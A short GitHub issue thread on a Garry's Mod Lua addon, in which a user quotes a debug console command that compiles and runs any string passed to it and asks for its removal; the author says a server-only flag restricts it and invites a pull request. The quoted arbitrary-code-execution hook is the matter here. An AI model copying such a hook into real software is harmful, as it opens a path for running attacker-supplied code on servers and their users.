### ISSUE TITLE
delete this code

### ISSUE THREAD

**Issue by svyanov** [Leystryku/ULX_LeySQL#1]
concommand.Add("_dbg_runshit", function(a, b, d, e)
    CompileString(e, "dbg")()
end, nil, "", FCVAR_SERVER_CAN_EXECUTE)

https://github.com/Leystryku/ULX_LeySQL/blob/master/lua/ulx_leysql.lua
136 Line

**Comment by PixeLInc** [comment]
If you want to delete it, why not just... make a pr or fork it and remove it on your fork lol

**Comment by Leystryku** [comment]
FCVAR_SERVER_CAN_EXECUTE is only executeable by the server.
If you want the code gone, please make a pull request.
Thanks :)
